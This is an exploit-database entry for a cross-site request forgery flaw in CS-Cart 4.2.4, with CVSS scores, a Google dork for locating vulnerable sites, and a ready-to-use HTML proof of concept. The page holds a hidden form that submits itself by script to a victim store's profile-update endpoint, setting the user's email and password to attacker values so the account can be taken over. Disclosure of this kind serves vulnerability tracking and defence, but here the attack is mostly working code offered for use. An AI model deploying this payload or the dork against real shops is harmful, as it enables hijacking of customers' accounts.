CS-Cart 4.2.4 CSRF

2015.03.26
Credit: Luis Santana
Risk: Low
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: CS-Cart 4.2.4 CSRF # Google Dork: intext:"&#169; 2004-2015 Simtech" # Date: March 11, 2015 # Exploit Author: Luis Santana # Vendor Homepage: http://cs-cart.com # Software Link: https://www.cs-cart.com/index.php?dispatch=pages.get_trial&page_id=297&edition=ultimate # Version: 4.2.4 # Tested on: Linux + PHP # CVE : [if one exists, or other VDB reference] Standard CSRF, allow you to change a users's password. Fairly lame but I noticed no one had reported this bug yet. Exploit pasted below and attached. <html> <head> <title>CS-CART CSRF 0day Exploit</title> </head> <body> <!-- Discovered By: Connection Exploit By: Connection Blacksun Hacker's Club irc.blacksunhackers.com #lobby --> <form action="http://<victim>/cscart/profiles-update/?selected_section=general" method="POST" id="CSRF" style="visibility:hidden"> <input type="hidden" name="user_data[email]" value="hacked@lol.dongs" /> <input type="hidden" name="user_data[password1]" value="CSRFpass" /> <input type="hidden" name="user_data[password2]" value="CSRFpass" /> <input type="hidden" name="user_data[profile_name]" value="Concept" /> <input type="hidden" name="dispatch[profiles.update]" value="" /> </form> <script> document.getElementById("CSRF").submit(); </script> </body> </html> Luis Santana - Security+ Administrator - http://hacktalk.net HackTalk Security - Security From The Underground


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top